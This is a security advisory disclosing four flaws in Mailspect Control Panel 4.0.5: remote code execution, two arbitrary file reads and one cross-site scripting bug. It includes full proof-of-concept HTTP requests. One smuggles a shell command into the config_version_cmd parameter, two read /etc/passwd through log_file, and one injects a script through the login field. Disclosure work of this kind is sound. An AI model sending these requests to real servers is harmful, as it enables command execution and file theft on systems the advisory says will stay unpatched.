Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities

Release Date:
===========
June 21, 2014

Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York.   The Mailspect product suite was launched 
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.  

Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter.  Subsequently, 
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in 
content filers and reputation engines.

Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel 
4.0.5 web application.

Vulnerability Disclosure Timeline:
=========================
May 4, 2014  :  Contact with Vendor
May 16, 2014  :  Vendor Response
June 21, 2014  :  Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected. 

Exploitation Technique:
==================
RCE:  Remote, Authenticated
AFR:  Remote, Authenticated
XSS:  Remote, Unauthenticated

Severity Level:
===========
High

Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami > 
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to 
"status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable.

2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary 
file name like "/etc/passwd" will cause the file's content's disclosure.

3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd" 
will cause the file's content's disclosure.

4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads 
the Javascript code's execution.

Proof of Concept (PoC):
==================
Proof of Concept RCE Request:

POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; 
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
 
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60

2. Proof of Concept AFR Request 1:

GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; 
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive 

3. Proof of Concept AFR Request 2:

POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; 
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
 
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on

4. Proof of Concept XSS Request:

GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive 

Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.

Security Risk:
==========
The risk of the vulnerabilities above estimated as high.

Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAÞ

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
      
Domain:  www.bga.com.tr/advisories.html
Social:    twitter.com/bgasecurity
Contact:  bilgi@bga.com.tr
  
Copyright © 2014 | BGA Security